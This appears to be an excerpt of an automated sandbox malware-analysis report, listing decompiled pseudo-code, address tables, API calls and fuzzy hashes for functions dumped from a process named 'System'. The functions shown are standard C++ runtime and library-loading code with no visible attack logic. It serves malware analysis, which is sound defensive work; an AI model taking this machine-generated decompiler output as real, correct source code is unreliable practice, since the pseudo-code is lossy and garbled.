                                                                                                                                                              0x7ff6e4c526af
                                                                                                                                                              0x7ff6e4c526b3
                                                                                                                                                              0x7ff6e4c526ba
                                                                                                                                                              0x7ff6e4c526c7
                                                                                                                                                              0x7ff6e4c526dd
                                                                                                                                                              0x7ff6e4c526e0
                                                                                                                                                              0x7ff6e4c526e5
                                                                                                                                                              0x7ff6e4c526eb
                                                                                                                                                              0x7ff6e4c526f1
                                                                                                                                                              0x7ff6e4c526fd
                                                                                                                                                              0x7ff6e4c526ff
                                                                                                                                                              0x7ff6e4c52704
                                                                                                                                                              0x7ff6e4c5270f
                                                                                                                                                              0x7ff6e4c52711
                                                                                                                                                              0x7ff6e4c52716
                                                                                                                                                              0x7ff6e4c52721
                                                                                                                                                              0x7ff6e4c52723
                                                                                                                                                              0x7ff6e4c52728
                                                                                                                                                              0x7ff6e4c52733
                                                                                                                                                              0x7ff6e4c52735
                                                                                                                                                              0x7ff6e4c5273a
                                                                                                                                                              0x7ff6e4c52745
                                                                                                                                                              0x7ff6e4c52747
                                                                                                                                                              0x7ff6e4c5274c
                                                                                                                                                              0x7ff6e4c52757
                                                                                                                                                              0x7ff6e4c52759
                                                                                                                                                              0x7ff6e4c5275e
                                                                                                                                                              0x7ff6e4c52762
                                                                                                                                                              0x7ff6e4c52766
                                                                                                                                                              0x7ff6e4c52776
                                                                                                                                                              0x7ff6e4c52778
                                                                                                                                                              0x7ff6e4c5277c
                                                                                                                                                              0x7ff6e4c5277c
                                                                                                                                                              0x7ff6e4c5277f
                                                                                                                                                              0x7ff6e4c5278d

                                                                                                                                                              APIs
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 0000000B.00000002.401874825.00007FF6E4C41000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FF6E4C40000, based on PE: true
                                                                                                                                                              • Associated: 0000000B.00000002.401841691.00007FF6E4C40000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                              • Associated: 0000000B.00000002.401978343.00007FF6E4C89000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                              • Associated: 0000000B.00000002.402012688.00007FF6E4CA9000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                              • Associated: 0000000B.00000002.402023641.00007FF6E4CAC000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_11_2_7ff6e4c40000_System.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: std::_$Lockit$Locinfo::_Locinfo_ctorLockit::_Lockit::~_
                                                                                                                                                              • String ID: bad locale name$false$true
                                                                                                                                                              • API String ID: 2775327233-1062449267
                                                                                                                                                              • Opcode ID: 1eeb45d107ce3ed273c96bcb45ed596d99b97333d3d46af19348d7509d6bd0e5
                                                                                                                                                              • Instruction ID: cab7e2f92810ce718c012c0c31e09156cb3f4d27df4238f4c18657c3efe89c58
                                                                                                                                                              • Opcode Fuzzy Hash: 1eeb45d107ce3ed273c96bcb45ed596d99b97333d3d46af19348d7509d6bd0e5
                                                                                                                                                              • Instruction Fuzzy Hash: BE414B27A9A74299EB14DFB0D4907FC23F4AF44F48F044836DA4D93A45CE3AE515C35A
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Function 00007FF6E4C527A0 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 116COMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              C-Code - Quality: 55%
                                                                                                                                                              			E00007FF67FF6E4C527A0(long long __rax, long long __rbx, signed long long* __rcx, void* __rdx) {
				char _t62;
				void* _t69;
				void* _t70;
				void* _t72;
				intOrPtr _t92;
				signed long long _t97;
				long long _t103;
				signed long long _t114;
				intOrPtr* _t122;
				void* _t129;
				void* _t135;
				signed long long* _t136;
				void* _t138;
				void* _t139;
				void* _t141;
				void* _t142;
				void* _t144;
				void* _t145;
				signed long long _t148;

				 *((long long*)(_t141 + 0x10)) = __rbx;
				_t139 = _t141 - 0x37;
				_t142 = _t141 - 0xf0;
				_t136 = __rcx;
				r15d = 0;
				 *((intOrPtr*)(_t139 + 0x67)) = r15d;
				if (__rcx == 0) goto 0xe4c529b7;
				if ( *((intOrPtr*)(__rcx)) != _t129) goto 0xe4c529b7;
				_t4 = _t148 + 0x30; // 0x30
				_t71 = _t4;
				E00007FF67FF6E4C623D8(__rax, __rcx);
				_t103 = __rax;
				 *((long long*)(_t139 + 0x77)) = __rax;
				if (__rax == 0) goto 0xe4c52922;
				_t92 =  *((intOrPtr*)(__rdx + 8));
				if (_t92 == 0) goto 0xe4c5280b;
				if ( *((intOrPtr*)(_t92 + 0x28)) != 0) goto 0xe4c52812;
				goto 0xe4c52812;
				E00007FF67FF6E4C60D0C(_t72, _t142 + 0x20);
				 *(_t142 + 0x28) = _t148;
				 *((char*)(_t142 + 0x30)) = 0;
				 *(_t142 + 0x38) = _t148;
				 *((char*)(_t139 - 0x79)) = 0;
				 *(_t139 - 0x71) = _t148;
				 *((intOrPtr*)(_t139 - 0x69)) = r15w;
				 *(_t139 - 0x61) = _t148;
				 *((intOrPtr*)(_t139 - 0x59)) = r15w;
				 *(_t139 - 0x51) = _t148;
				 *((char*)(_t139 - 0x49)) = 0;
				 *(_t139 - 0x41) = _t148;
				 *((char*)(_t139 - 0x39)) = 0;
				if (0xe4c9f71b == 0) goto 0xe4c529d3;
				E00007FF67FF6E4C612B8(_t92, _t103, _t142 + 0x20, 0xe4c9f71b);
				 *((long long*)(_t103 + 8)) = 0x1;
				 *_t103 = 0xe4c89ae8;
				E00007FF67FF6E4C6C474(0xe4c89ae8);
				E00007FF67FF6E4C619B4(0xe4c89ae8, _t103, _t139 - 0x31, _t144);
				 *(_t103 + 0x10) = _t148;
				 *(_t103 + 0x20) = _t148;
				 *(_t103 + 0x28) = _t148;
				 *((long long*)(_t139 + 0x7f)) = _t103;
				_t62 = E00007FF67FF6E4C619B4(0xe4c89ae8, _t103, _t139 - 1, _t144);
				0xe4c6bffc();
				if (0xe4c89ae8 == 0) goto 0xe4c529e0;
				 *0xe4c89ae8 = 0;
				 *(_t103 + 0x10) = 0xe4c89ae8;
				0xe4c6bffc();
				if (0xe4c89ae8 == 0) goto 0xe4c529e6;
				 *0xe4c89ae8 =  *0xe4c896e8;
				_t97 =  *0xe4c896ec & 0x0000ffff;
				 *0x7FF6E4C89AEC = _t62;
				 *(_t103 + 0x20) = 0xe4c89ae8;
				0xe4c6bffc();
				_t114 = _t97;
				if (_t97 == 0) goto 0xe4c529ec;
				 *_t114 =  *0xe4c896f0;
				 *((char*)(_t114 + 4)) = _t62;
				 *(_t103 + 0x28) = _t114;
				 *((short*)(_t103 + 0x18)) = 0x2c2e;
				goto 0xe4c52925;
				_t104 = _t148;
				 *_t136 = _t148;
				if ((dil & 0x00000001) == 0) goto 0xe4c529b7;
				E00007FF67FF6E4C61324(_t142 + 0x20);
				if ( *(_t139 - 0x41) == 0) goto 0xe4c5294a;
				E00007FF67FF6E4C69C88(_t4, _t72, _t148, 0x1, _t148);
				 *(_t139 - 0x41) = _t148;
				if ( *(_t139 - 0x51) == 0) goto 0xe4c5295c;
				E00007FF67FF6E4C69C88(_t4, _t72, _t148, 0x1, _t145);
				 *(_t139 - 0x51) = _t148;
				if ( *(_t139 - 0x61) == 0) goto 0xe4c5296e;
				E00007FF67FF6E4C69C88(_t4, _t72, _t104, 0x1, _t129);
				 *(_t139 - 0x61) = _t148;
				if ( *(_t139 - 0x71) == 0) goto 0xe4c52980;
				E00007FF67FF6E4C69C88(_t71, _t72, _t104, 0x1, _t135);
				 *(_t139 - 0x71) = _t148;
				if ( *(_t142 + 0x38) == 0) goto 0xe4c52993;
				E00007FF67FF6E4C69C88(_t71, _t72, _t104, 0x1, _t138);
				 *(_t142 + 0x38) = _t148;
				if ( *(_t142 + 0x28) == 0) goto 0xe4c529a7;
				_t69 = E00007FF67FF6E4C69C88(_t71, _t72, _t104, 0x1);
				 *(_t142 + 0x28) = _t148;
				_t122 = _t142 + 0x20;
				_t70 = E00007FF67FF6E4C60D84(_t69, _t122);
				 *_t122 =  *_t122 - _t70;
				 *0x4 =  *0x4 + _t70;
				return _t70;
			}






















                                                                                                                                                              0x7ff6e4c527a0
                                                                                                                                                              0x7ff6e4c527ac
                                                                                                                                                              0x7ff6e4c527b1
                                                                                                                                                              0x7ff6e4c527bb
                                                                                                                                                              0x7ff6e4c527be
                                                                                                                                                              0x7ff6e4c527c4
                                                                                                                                                              0x7ff6e4c527cb
                                                                                                                                                              0x7ff6e4c527d4
                                                                                                                                                              0x7ff6e4c527da
                                                                                                                                                              0x7ff6e4c527da
                                                                                                                                                              0x7ff6e4c527de
                                                                                                                                                              0x7ff6e4c527e3
                                                                                                                                                              0x7ff6e4c527e6
                                                                                                                                                              0x7ff6e4c527ed
                                                                                                                                                              0x7ff6e4c527f3
                                                                                                                                                              0x7ff6e4c527fa
                                                                                                                                                              0x7ff6e4c52803
                                                                                                                                                              0x7ff6e4c52809
                                                                                                                                                              0x7ff6e4c52819
                                                                                                                                                              0x7ff6e4c5281f
                                                                                                                                                              0x7ff6e4c52824
                                                                                                                                                              0x7ff6e4c52829
                                                                                                                                                              0x7ff6e4c5282e
                                                                                                                                                              0x7ff6e4c52832
                                                                                                                                                              0x7ff6e4c52836
                                                                                                                                                              0x7ff6e4c5283b
                                                                                                                                                              0x7ff6e4c5283f
                                                                                                                                                              0x7ff6e4c52844
                                                                                                                                                              0x7ff6e4c52848
                                                                                                                                                              0x7ff6e4c5284c
                                                                                                                                                              0x7ff6e4c52850
                                                                                                                                                              0x7ff6e4c52857
                                                                                                                                                              0x7ff6e4c52865
                                                                                                                                                              0x7ff6e4c52874
                                                                                                                                                              0x7ff6e4c5287e
                                                                                                                                                              0x7ff6e4c52881
                                                                                                                                                              0x7ff6e4c5288a
                                                                                                                                                              0x7ff6e4c5288f
                                                                                                                                                              0x7ff6e4c52893
                                                                                                                                                              0x7ff6e4c52897
                                                                                                                                                              0x7ff6e4c5289b
                                                                                                                                                              0x7ff6e4c528a3
                                                                                                                                                              0x7ff6e4c528ac
                                                                                                                                                              0x7ff6e4c528b4
                                                                                                                                                              0x7ff6e4c528ba
                                                                                                                                                              0x7ff6e4c528bd
                                                                                                                                                              0x7ff6e4c528c6
                                                                                                                                                              0x7ff6e4c528d1
                                                                                                                                                              0x7ff6e4c528dd
                                                                                                                                                              0x7ff6e4c528df
                                                                                                                                                              0x7ff6e4c528e6
                                                                                                                                                              0x7ff6e4c528ea
                                                                                                                                                              0x7ff6e4c528f3
                                                                                                                                                              0x7ff6e4c528f8
                                                                                                                                                              0x7ff6e4c528fe
                                                                                                                                                              0x7ff6e4c5290a
                                                                                                                                                              0x7ff6e4c52913
                                                                                                                                                              0x7ff6e4c52916
                                                                                                                                                              0x7ff6e4c5291a
                                                                                                                                                              0x7ff6e4c52920
                                                                                                                                                              0x7ff6e4c52922
                                                                                                                                                              0x7ff6e4c52925
                                                                                                                                                              0x7ff6e4c5292c
                                                                                                                                                              0x7ff6e4c52937
                                                                                                                                                              0x7ff6e4c52943
                                                                                                                                                              0x7ff6e4c52945
                                                                                                                                                              0x7ff6e4c5294a
                                                                                                                                                              0x7ff6e4c52955
                                                                                                                                                              0x7ff6e4c52957
                                                                                                                                                              0x7ff6e4c5295c
                                                                                                                                                              0x7ff6e4c52967
                                                                                                                                                              0x7ff6e4c52969
                                                                                                                                                              0x7ff6e4c5296e
                                                                                                                                                              0x7ff6e4c52979
                                                                                                                                                              0x7ff6e4c5297b
                                                                                                                                                              0x7ff6e4c52980
                                                                                                                                                              0x7ff6e4c5298c
                                                                                                                                                              0x7ff6e4c5298e
                                                                                                                                                              0x7ff6e4c52993
                                                                                                                                                              0x7ff6e4c529a0
                                                                                                                                                              0x7ff6e4c529a2
                                                                                                                                                              0x7ff6e4c529a7
                                                                                                                                                              0x7ff6e4c529ac
                                                                                                                                                              0x7ff6e4c529b1
                                                                                                                                                              0x7ff6e4c529c0
                                                                                                                                                              0x7ff6e4c529c2
                                                                                                                                                              0x7ff6e4c529d2

                                                                                                                                                              APIs
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 0000000B.00000002.401874825.00007FF6E4C41000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FF6E4C40000, based on PE: true
                                                                                                                                                              • Associated: 0000000B.00000002.401841691.00007FF6E4C40000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                              • Associated: 0000000B.00000002.401978343.00007FF6E4C89000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                              • Associated: 0000000B.00000002.402012688.00007FF6E4CA9000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                              • Associated: 0000000B.00000002.402023641.00007FF6E4CAC000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_11_2_7ff6e4c40000_System.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: Concurrency::cancel_current_task$Lockitstd::_$Lockit::_Lockit::~_
                                                                                                                                                              • String ID: bad locale name
                                                                                                                                                              • API String ID: 2973761340-1405518554
                                                                                                                                                              • Opcode ID: cad4bfeb1abbed5b12918a7b2a78b645da74acb522a2df89faca2d5c21a3e076
                                                                                                                                                              • Instruction ID: 470f6b6923ea5b5a953c2ecc345de34586c66c78400cc9b6ada6253621ca76e3
                                                                                                                                                              • Opcode Fuzzy Hash: cad4bfeb1abbed5b12918a7b2a78b645da74acb522a2df89faca2d5c21a3e076
                                                                                                                                                              • Instruction Fuzzy Hash: FE418E2BA9974385FB15DBB0A0903BD22F0AF40F44F04447ADE8D97A86CE3DE415C75A
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Function 00007FF6E4C681CC Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 88libraryloaderCOMMONLIBRARYCODE
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              C-Code - Quality: 50%
                                                                                                                                                              			E00007FF67FF6E4C681CC(void* __ecx, long long __rbx, void* __rdx, long long __rsi, intOrPtr* __r8, void* __r9) {
				_Unknown_base(*)()* _t43;
				intOrPtr _t59;
				intOrPtr _t60;
				intOrPtr _t64;
				intOrPtr _t67;
				intOrPtr _t68;
				signed long long _t71;
				struct HINSTANCE__* _t84;
				signed long long _t85;
				signed long long _t88;
				long long _t90;
				void* _t94;
				struct HINSTANCE__* _t99;
				long _t102;
				void* _t105;
				signed long long _t106;
				WCHAR* _t109;

				 *((long long*)(_t94 + 8)) = __rbx;
				 *((long long*)(_t94 + 0x10)) = _t90;
				 *((long long*)(_t94 + 0x18)) = __rsi;
				_t85 = _t71;
				_t106 = _t105 | 0xffffffff;
				_t59 =  *((intOrPtr*)(0x7ff6e4c40000 + 0x6b298 + _t85 * 8));
				if (_t59 == _t106) goto 0xe4c682fb;
				if (_t59 != 0) goto 0xe4c682fd;
				if (__r8 == __r9) goto 0xe4c682f3;
				_t88 =  *((intOrPtr*)(__r8));
				_t67 =  *((intOrPtr*)(0x7ff6e4c40000 + 0x6b280 + _t88 * 8));
				_t60 = _t59;
				if (_t67 == 0) goto 0xe4c6823e;
				if (_t67 != _t106) goto 0xe4c682d5;
				goto 0xe4c682a9;
				r8d = 0x800;
				LoadLibraryExW(_t109, _t105, _t102);
				_t68 = _t60;
				if (_t60 != 0) goto 0xe4c682b5;
				GetLastError();
				if (_t60 != 0x57) goto 0xe4c68297;
				_t16 = _t68 + 7; // 0x7
				r8d = _t16;
				E00007FF67FF6E4C74FA0(__r8);
				if (_t60 == 0) goto 0xe4c68297;
				r8d = 0;
				LoadLibraryExW(??, ??, ??);
				if (_t60 != 0) goto 0xe4c682b5;
				 *((intOrPtr*)(0x7ff6e4c40000 + 0x6b280 + _t88 * 8)) = _t106;
				goto 0xe4c6821c;
				_t23 = 0x7ff6e4c40000 + 0x6b280 + _t88 * 8;
				_t64 =  *_t23;
				 *_t23 = _t60;
				if (_t64 == 0) goto 0xe4c682d5;
				FreeLibrary(_t99);
				_t43 = GetProcAddress(_t84);
				if (_t64 == 0) goto 0xe4c682f3;
				 *((intOrPtr*)(0x7ff6e4c40000 + 0x6b298 + _t85 * 8)) = _t64;
				goto 0xe4c682fd;
				 *((intOrPtr*)(0x7ff6e4c40000 + 0x6b298 + _t85 * 8)) = _t106;
				return _t43;
			}




















                                                                                                                                                              0x7ff6e4c681cc
                                                                                                                                                              0x7ff6e4c681d1
                                                                                                                                                              0x7ff6e4c681d6
                                                                                                                                                              0x7ff6e4c681e8
                                                                                                                                                              0x7ff6e4c681f1
                                                                                                                                                              0x7ff6e4c68206
                                                                                                                                                              0x7ff6e4c6820a
                                                                                                                                                              0x7ff6e4c68213
                                                                                                                                                              0x7ff6e4c6821c
                                                                                                                                                              0x7ff6e4c68222
                                                                                                                                                              0x7ff6e4c68225
                                                                                                                                                              0x7ff6e4c6822d
                                                                                                                                                              0x7ff6e4c68231
                                                                                                                                                              0x7ff6e4c68236
                                                                                                                                                              0x7ff6e4c6823c
                                                                                                                                                              0x7ff6e4c6824b
                                                                                                                                                              0x7ff6e4c68251
                                                                                                                                                              0x7ff6e4c68257
                                                                                                                                                              0x7ff6e4c6825d
                                                                                                                                                              0x7ff6e4c6825f
                                                                                                                                                              0x7ff6e4c68268
                                                                                                                                                              0x7ff6e4c6826a
                                                                                                                                                              0x7ff6e4c6826a
                                                                                                                                                              0x7ff6e4c68278
                                                                                                                                                              0x7ff6e4c6827f
                                                                                                                                                              0x7ff6e4c68281
                                                                                                                                                              0x7ff6e4c68289
                                                                                                                                                              0x7ff6e4c68295
                                                                                                                                                              0x7ff6e4c682a1
                                                                                                                                                              0x7ff6e4c682b0
                                                                                                                                                              0x7ff6e4c682bf
                                                                                                                                                              0x7ff6e4c682bf
                                                                                                                                                              0x7ff6e4c682bf
                                                                                                                                                              0x7ff6e4c682ca
                                                                                                                                                              0x7ff6e4c682cf
                                                                                                                                                              0x7ff6e4c682db
                                                                                                                                                              0x7ff6e4c682e4
                                                                                                                                                              0x7ff6e4c682e9
                                                                                                                                                              0x7ff6e4c682f1
                                                                                                                                                              0x7ff6e4c682f3
                                                                                                                                                              0x7ff6e4c68319

                                                                                                                                                              APIs
                                                                                                                                                              • LoadLibraryExW.KERNEL32(?,?,?,00007FF6E4C6847E,?,?,?,00007FF6E4C680F4,?,?,?,?,00007FF6E4C64C69), ref: 00007FF6E4C68251
                                                                                                                                                              • GetLastError.KERNEL32(?,?,?,00007FF6E4C6847E,?,?,?,00007FF6E4C680F4,?,?,?,?,00007FF6E4C64C69), ref: 00007FF6E4C6825F
                                                                                                                                                              • LoadLibraryExW.KERNEL32(?,?,?,00007FF6E4C6847E,?,?,?,00007FF6E4C680F4,?,?,?,?,00007FF6E4C64C69), ref: 00007FF6E4C68289
                                                                                                                                                              • FreeLibrary.KERNEL32(?,?,?,00007FF6E4C6847E,?,?,?,00007FF6E4C680F4,?,?,?,?,00007FF6E4C64C69), ref: 00007FF6E4C682CF
                                                                                                                                                              • GetProcAddress.KERNEL32(?,?,?,00007FF6E4C6847E,?,?,?,00007FF6E4C680F4,?,?,?,?,00007FF6E4C64C69), ref: 00007FF6E4C682DB
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 0000000B.00000002.401874825.00007FF6E4C41000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FF6E4C40000, based on PE: true
                                                                                                                                                              • Associated: 0000000B.00000002.401841691.00007FF6E4C40000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                              • Associated: 0000000B.00000002.401978343.00007FF6E4C89000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                              • Associated: 0000000B.00000002.402012688.00007FF6E4CA9000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                              • Associated: 0000000B.00000002.402023641.00007FF6E4CAC000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_11_2_7ff6e4c40000_System.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: Library$Load$AddressErrorFreeLastProc
                                                                                                                                                              • String ID: api-ms-
                                                                                                                                                              • API String ID: 2559590344-2084034818
                                                                                                                                                              • Opcode ID: 362fdf90d6ed18511f73797504d860d3f8892a8d19e42068341458e028504b74
                                                                                                                                                              • Instruction ID: e06d49d70321c87dd935ae2caa02806fef5ffbeaf3a8347f235a8a0d99eb4647
                                                                                                                                                              • Opcode Fuzzy Hash: 362fdf90d6ed18511f73797504d860d3f8892a8d19e42068341458e028504b74
                                                                                                                                                              • Instruction Fuzzy Hash: DC31D42BEABA4391EE119B22A48037523B4BF48FA4F194136DD1D8B394DF3DE441831A
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Function 00007FF6E4C85E24 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 48fileCOMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              APIs
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 0000000B.00000002.401874825.00007FF6E4C41000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FF6E4C40000, based on PE: true
                                                                                                                                                              • Associated: 0000000B.00000002.401841691.00007FF6E4C40000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                              • Associated: 0000000B.00000002.401978343.00007FF6E4C89000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                              • Associated: 0000000B.00000002.402012688.00007FF6E4CA9000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                              • Associated: 0000000B.00000002.402023641.00007FF6E4CAC000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_11_2_7ff6e4c40000_System.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: ConsoleWrite$CloseCreateErrorFileHandleLast
                                                                                                                                                              • String ID: CONOUT$
                                                                                                                                                              • API String ID: 3230265001-3130406586
                                                                                                                                                              • Opcode ID: a0e6ca28e7342ea06f8a26954a7a12586c95e7292c70b1250db6135522365c85
                                                                                                                                                              • Instruction ID: 644d9397b4ccdd0449a01437779d0f825326c056fdf270b0fcdc324a7290736b
                                                                                                                                                              • Opcode Fuzzy Hash: a0e6ca28e7342ea06f8a26954a7a12586c95e7292c70b1250db6135522365c85
                                                                                                                                                              • Instruction Fuzzy Hash: 16118436658A4286E3508B62F89432562B0FB4CFE4F004236DA5EC7794CF7DE504874A
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Function 00007FF6E4C61D6C Relevance: 9.2, APIs: 6, Instructions: 203COMMONLIBRARYCODE
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              APIs
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 0000000B.00000002.401874825.00007FF6E4C41000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FF6E4C40000, based on PE: true
                                                                                                                                                              • Associated: 0000000B.00000002.401841691.00007FF6E4C40000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                              • Associated: 0000000B.00000002.401978343.00007FF6E4C89000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                              • Associated: 0000000B.00000002.402012688.00007FF6E4CA9000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                              • Associated: 0000000B.00000002.402023641.00007FF6E4CAC000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_11_2_7ff6e4c40000_System.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: ByteCharMultiStringWide
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 2829165498-0
                                                                                                                                                              • Opcode ID: 34b77b060394fd588544f57bc0a38c2b723bd77398f4e952ae7e1543e0e8636c
                                                                                                                                                              • Instruction ID: 40d4087d404e053c8b50016c99a540fc4a600ef231f1b602d6590dd7e0e8f5ba
                                                                                                                                                              • Opcode Fuzzy Hash: 34b77b060394fd588544f57bc0a38c2b723bd77398f4e952ae7e1543e0e8636c
                                                                                                                                                              • Instruction Fuzzy Hash: 42818037A6974386EB209F61D48037966B1FB44FA4F148276EA5D97BC8DF3EE4018306
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Function 00007FF6E4C4BDE0 Relevance: 9.1, APIs: 6, Instructions: 91COMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              C-Code - Quality: 93%
                                                                                                                                                              			E00007FF67FF6E4C4BDE0(long long __rbx, void* __rcx, long long __rsi) {
				void* _t32;
				void* _t36;
				void* _t39;
				void* _t40;
				void* _t42;
				signed long long _t51;
				long long _t54;
				long long _t55;
				intOrPtr _t56;
				intOrPtr _t57;
				long long _t64;
				intOrPtr _t70;
				void* _t81;
				intOrPtr _t82;
				signed long long _t83;
				long long _t86;
				long long _t88;
				void* _t89;
				void* _t91;
				signed long long _t92;

				 *((long long*)(_t91 + 0x10)) = __rbx;
				 *((long long*)(_t91 + 0x18)) = _t88;
				 *((long long*)(_t91 + 0x20)) = __rsi;
				_t92 = _t91 - 0x40;
				_t51 =  *0xe4ca90a0; // 0x1ae1b17e2973
				 *(_t92 + 0x30) = _t51 ^ _t92;
				_t89 = __rcx;
				E00007FF67FF6E4C60D0C(_t40, _t92 + 0x24);
				_t86 =  *0xe4cabe48; // 0x23fb3c20ae0
				 *((long long*)(_t92 + 0x28)) = _t86;
				_t82 =  *0xe4cabe90; // 0x2
				if (_t82 != 0) goto 0xe4c4be68;
				E00007FF67FF6E4C60D0C(_t40, _t92 + 0x20);
				_t42 =  *0xe4cabe90 - _t82; // 0x2
				if (_t42 != 0) goto 0xe4c4be57;
				_t54 =  *0xe4caa8f0; // 0x4
				_t55 = _t54 + 1;
				 *0xe4caa8f0 = _t55;
				 *0xe4cabe90 = _t55;
				_t32 = E00007FF67FF6E4C60D84(_t55, _t92 + 0x20);
				_t83 =  *0xe4cabe90; // 0x2
				_t70 =  *((intOrPtr*)(_t89 + 8));
				if (_t83 -  *((intOrPtr*)(_t70 + 0x18)) >= 0) goto 0xe4c4be81;
				_t56 =  *((intOrPtr*)(_t70 + 0x10));
				if ( *((intOrPtr*)(_t56 + _t83 * 8)) != 0) goto 0xe4c4bee0;
				goto 0xe4c4be83;
				if ( *((char*)(_t70 + 0x24)) == 0) goto 0xe4c4be9c;
				E00007FF67FF6E4C6113C(_t32);
				if (_t83 -  *((intOrPtr*)(_t56 + 0x18)) >= 0) goto 0xe4c4bea1;
				_t57 =  *((intOrPtr*)(_t56 + 0x10));
				if ( *((intOrPtr*)(_t57 + _t83 * 8)) != 0) goto 0xe4c4bee0;
				if (_t86 == 0) goto 0xe4c4beab;
				goto 0xe4c4bee0;
				E00007FF67FF6E4C4D010(_t57, _t86, _t92 + 0x28, _t89, _t86);
				if (_t57 == 0xffffffff) goto 0xe4c4bf0f;
				_t64 =  *((intOrPtr*)(_t92 + 0x28));
				 *((long long*)(_t92 + 0x28)) = _t64;
				E00007FF67FF6E4C61104(_t57, _t64);
				_t36 =  *((intOrPtr*)( *_t64 + 8))(_t81);
				 *0xe4cabe48 = _t64;
				return E00007FF67FF6E4C623B0(E00007FF67FF6E4C60D84(_t36, _t92 + 0x24), _t39,  *(_t92 + 0x30) ^ _t92);
			}























                                                                                                                                                              0x7ff6e4c4bde0
                                                                                                                                                              0x7ff6e4c4bde5
                                                                                                                                                              0x7ff6e4c4bdea
                                                                                                                                                              0x7ff6e4c4bdf0
                                                                                                                                                              0x7ff6e4c4bdf4
                                                                                                                                                              0x7ff6e4c4bdfe
                                                                                                                                                              0x7ff6e4c4be03
                                                                                                                                                              0x7ff6e4c4be0d
                                                                                                                                                              0x7ff6e4c4be13
                                                                                                                                                              0x7ff6e4c4be1a
                                                                                                                                                              0x7ff6e4c4be1f
                                                                                                                                                              0x7ff6e4c4be29
                                                                                                                                                              0x7ff6e4c4be32
                                                                                                                                                              0x7ff6e4c4be37
                                                                                                                                                              0x7ff6e4c4be3e
                                                                                                                                                              0x7ff6e4c4be40
                                                                                                                                                              0x7ff6e4c4be46
                                                                                                                                                              0x7ff6e4c4be48
                                                                                                                                                              0x7ff6e4c4be50
                                                                                                                                                              0x7ff6e4c4be5c
                                                                                                                                                              0x7ff6e4c4be61
                                                                                                                                                              0x7ff6e4c4be68
                                                                                                                                                              0x7ff6e4c4be70
                                                                                                                                                              0x7ff6e4c4be72
                                                                                                                                                              0x7ff6e4c4be7d
                                                                                                                                                              0x7ff6e4c4be7f
                                                                                                                                                              0x7ff6e4c4be87
                                                                                                                                                              0x7ff6e4c4be89
                                                                                                                                                              0x7ff6e4c4be92
                                                                                                                                                              0x7ff6e4c4be94
                                                                                                                                                              0x7ff6e4c4be9f
                                                                                                                                                              0x7ff6e4c4bea4
                                                                                                                                                              0x7ff6e4c4bea9
                                                                                                                                                              0x7ff6e4c4beb3
                                                                                                                                                              0x7ff6e4c4bebc
                                                                                                                                                              0x7ff6e4c4bebe
                                                                                                                                                              0x7ff6e4c4bec3
                                                                                                                                                              0x7ff6e4c4becb
                                                                                                                                                              0x7ff6e4c4bed6
                                                                                                                                                              0x7ff6e4c4bed9
